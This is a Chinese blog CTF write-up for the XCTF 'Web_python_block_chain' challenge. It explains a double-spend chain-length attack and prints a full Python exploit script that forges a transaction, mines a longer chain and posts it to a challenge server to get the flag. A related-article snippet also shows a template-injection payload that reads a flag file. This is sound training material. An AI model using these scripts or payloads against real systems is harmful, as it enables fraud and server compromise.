攻防世界 WEB Web_python_block_chain

最新推荐文章于 2022-02-06 10:45:10 发布
最新推荐文章于 2022-02-06 10:45:10 发布
阅读量6.1k 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120303398
版权

这题是区块链题,对区块链不是很了解,想了解原理的建议看这一篇
https://blog.csdn.net/hxhxhxhxx/article/details/108111692
简单介绍一下双花攻击的原理吧,就是区块链是去中心化账本,而且默认长度最长的是主链
如果用户自持有的账本长度大于中心化中心的账本,那么所有的节点都会以当前用户的账本覆盖当前持有的账本,这边是0确认,
就是整个链里就你一个人,所以没有人跟你竞争,所以一定会成功。具体的也不清楚,直接看大佬的脚本吧
具体要改的就是url的三个参数和三个addr
简单演示一下

# -*- encoding: utf-8 -*-
# written in python 2.7
import hashlib, json, rsa, uuid, os,requests,re

# 一堆变量常量

url_root="http://111.200.241.244:52910/"
url_create="http://111.200.241.244:52910/create_transaction"
url_flag="http://111.200.241.244:52910/flag"

s=requests.Session()
ddcoin = s.get(url=url_root)

prev_one=re.search(r"hash of genesis block: ([0-9a-f]{64})",ddcoin.content, flags=0).group(1)
bank_utox_id=re.search(r"\"input\": \[\"([0-9a-f\-]{36})",ddcoin.content, flags=0).group(1)
bank_signature=re.search(r"\"signature\": \[\"([0-9a-f]{96})",ddcoin.content, flags=0).group(1)

DIFFICULTY = int('00000' + 'f' * 59, 16)
EMPTY_HASH = '0'*64

bank_addr="83c1ec7b05a19528bc5520ede1b11c0faf92bc11187497c98a034473aa35c58263026587e4e8bde66bc95437fd73c06b"
hacke_addr="8b70905e184624c3078ba496a9b35ba5a1c5c79f296dfe45c13ff4b9df98b41c064bd810ffc0a230aae8f3d0514053a5"
shop_addr="90a6e1e679ca51b1704c0d4fb47ae64bc3cafde95ddd4486132f4c41b407ce24a3073927fb94a1a8ebc75623329fda85"

# 源码中的API

def hash(x):
    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()

def hash_reducer(x, y):
    return hash(hash(x)+hash(y))

def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'], reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)
    ])

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo

def create_tx(input_utxo_ids, output_utxo, privkey_from=None):
    tx = {'input': input_utxo_ids, 'signature':[bank_signature], 'output': output_utxo}  # 修改了签名
    tx['hash'] = hash_tx(tx)
    return tx

def create_block(prev_block_hash, nonce_str, transactions):
    if type(prev_block_hash) != type(''): raise Exception('prev_block_hash should be hex-encoded hash value')
    nonce = str(nonce_str)
    if len(nonce) > 128: raise Exception('the nonce is too long')
    block = {'prev': prev_block_hash, 'nonce': nonce, 'transactions': transactions}
    block['hash'] = hash_block(block)
    return block


# 构造的方法

def check_hash(prev,tx):
    for i in range(10000000):
        current_block=create_block(prev,str(i),tx)
        block_hash = int(current_block['hash'], 16)
        if block_hash<DIFFICULTY:
            print json.dumps(current_block)
            return current_block

def create_feak_one():
    utxo_first=create_output_utxo(shop_addr,1000000)
    tx_first=create_tx([bank_utox_id],[utxo_first])
    return check_hash(prev_one,[tx_first])

def create_empty_block(prev):
    return check_hash(prev,[])


# 攻击过程

a=create_feak_one()
print s.post(url=url_create,data=str(json.dumps(a))).content
b=create_empty_block(a['hash'])
print s.post(url=url_create,data=str(json.dumps(b))).content
c=create_empty_block(b['hash'])
print s.post(url=url_create,data=str(json.dumps(c))).content
d=create_empty_block(c['hash'])
print s.post(url=url_create,data=str(json.dumps(d))).content
e=create_empty_block(d['hash'])
print s.post(url=url_create,data=str(json.dumps(e))).content
print s.get(url=url_flag).content

参考视频链接:https://www.bilibili.com/video/BV15U4y1A7eG/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 8分题 Web_python_block_chain
闵行小鱼塘
10-03 1540
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是Web_python_block_chain的writeup
fake_useragent.zip
08-27
Python编程中,Fake UserAgent库是一个非常实用的工具,它允许开发者生成逼真的用户代理字符串,以模拟不同浏览器或设备访问网站。这个工具的主要作用是帮助开发人员在进行网络爬虫或者自动化测试时,避免被目标...
攻防世界--Web_python_block_chain
qq_46263951的博客
01-21 1万+
通过这道题对区块链有了一个简单的了解,这道题主要是参考师傅们的wp,所以这里就不再赘述,主要讲一下自己的收获。 这道题利用的是双花攻击中的51% attack。51% attack指的是攻击者如果可以拥有超过全网50%的算力,就可以创造一条高度大于原始链的链,攻击者可以发送一个新的块到这条链上。 这里使用的为0确认,就是不需要别人确认,就如我们生活中的一手交钱一手交货,不同的是生活中我们处于中心化社会,银行会帮我们确认。而6确认就是需要经过6个人(区块被挖出)交易才确定。 区块链的规则:当出现分叉时,
[攻防世界]-WEB高手进阶区-Web_python_block_chain
爱国小白帽
10-02 785
Poc 已给出,只需更改 ip 和三个 addr # -*- encoding: utf-8 -*- # written in python 2.7 import hashlib, json, rsa, uuid, os,requests,re # 一堆变量常量 url_root="http://220.249.52.133:39176/" url_create="http://220.249.52.133:39176/create_transaction" url_flag="http://220.
攻防世界web进阶区Web_python_block_chain详解
hxhxhxhxx的博客
08-19 2565
攻防世界web进阶区Web_python_block_chain详解题目详解51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been restarted at 21: 45 04 / 17.All blockchain have been reset.View source code hash of genesis block: 1787809bc3d510a8137f05be51aca5b4597112339cd51f819ccd979372ef3
Python实现第一个区块链结构-blockchain
qq_31698195的博客
06-12 1107
# 导入hashlib包 import hashlib # 定义区块类 class Block: # 构造函数,包含4大属性 def __init__(self,index,timestamp,data,previous_hash): # 前一个区块的哈希值 self.previous_hash = previous_hash # ...
web_easy_
09-30
【标题】"web_easy_" 指的可能是一款基于Web的用户界面皮肤,它经过了定制化设计,以满足特定客户的需求。"web"通常代表Web应用或网站,而"_easy_"部分可能意味着这款皮肤追求的是简洁易用的用户体验。 在Web开发中...
pythonPDF_pdf_python_
09-29
在IT行业中,Python是一种广泛应用的编程语言,尤其在数据处理和自动化任务方面表现突出。本话题聚焦于使用Python处理PDF文档,特别是如何将多页的PDF文档拆分成多个单页PDF文档。PDF(Portable Document Format)是...
网络web安全攻防技术_漏洞分析_网络攻防_网络安全_vulnerability_
09-29
常见网络安全协议工具使用方法,web安全漏洞分析、漏洞案例,web攻防思路分享。
jiangzuo.rar_cloud computing java_网络攻防_防火墙
09-21
网络技术以及云计算系列讲解,包括网络攻防,防火墙技术等
blockchain
04-05
python开发简单的区块链集群 区块链是分布式数据存储、点对点传输、共识机制、加密算法等计算机技术的新型应用模式。所谓共识机制是区块链系统中实现不同节点之间建立信任、获取权益的数学算法。
Python-blockchain开源教程从零开始写区块链
08-10
blockchain 开源教程:从零开始写区块链
攻防世界(web高手进阶区)——32~44题
weixin_43610673的博客
08-04 2388
题号会变动可能不太一样 目录Web_php_wrong_nginx_configCommentZhuanxvWeb_python_block_chainics-02love_mathWeb_python_flask_sql_injection/register路由/edit_profile路由FilemanagerBilibiliSmartyTriangleTimeKeepereasylaravel Web_php_wrong_nginx_config 直接尝试登录,另修改isLogin=1 无效 有r
blockchain-python-tutorial搭建出坑记
AlexLJM的专栏
05-17 935
国外大神开发了一个python版本的区块链实验环境,于是想也搭建下看看,github上环境准备介绍的很简单,但实际搭建时坑很多,解决方法记录如下:github地址:https://github.com/adilmoujahid/blockchain-python-tutorial1. 需要python3.6,这个没啥好说的,但是运行python blockchain.py -p 5000,会提示缺...
50行python代码实现的小区块链
热门推荐
神棍之路
08-25 7万+
import hashlib as hasher import datetime as date # Define what a Snakecoin block is class Block: def __init__(self, index, timestamp, data, previous_hash): self.index = index se
攻防世界web进阶区之Web_python_template_injection
qq_45756971的博客
07-16 264
点开题目所给链接:我们通过 {{1+1}} 判断了它存在phthon模块注入:通过 http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()%7D%7D访问所有模块。 我们可以借用 os.popen来读取我们想要的flag文件里的信息 构造http://220.249.52.133:36210/%7B%7B’’.class.mro[2].subclasses()[71]%E3%80%80%E3%80%80.init.globals[‘
攻防世界 WEB easy_laravel
qq_41696858的博客
02-06 3486
这题我一开始是在攻防世界做的,但是不知道今天靶场又抽什么风了。。。。反正两个靶场配置有点不一样,但是出入不是很大,BUUCTF需要提前手动利用管理员邮箱reset_password一下,攻防世界不需要 打开场景,审计页面源码,发现源码地址直接给出来了,非常的简单粗暴啊 https://github.com/qazxcv123/easy_laravel 建议把源码下下来,自己搭个环境慢慢看,不然不方便。那就看源码呗,先看路由,mvc的入口点 哦对了先说一下,larvel是一个PHP的web框架 在一个个尝试路
攻防世界 WEB filemanager
qq_41696858的博客
09-27 1051
这题有源码泄露,先扫一波,dirsearch -u http://111.200.241.244:58290/ 扫出来var.www.gz,下下来分析,直接上有错误的sql注入点吧,在rename.php里面,在rename的时候并没有对文件后缀进行检验,特殊字符也没有过滤,那么这里就是注入点 if ($result) { $req['newname'] = basename($req['newname']); $re = $db->query("update `file` set `fil
攻防世界web_python_template_injection
最新发布
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值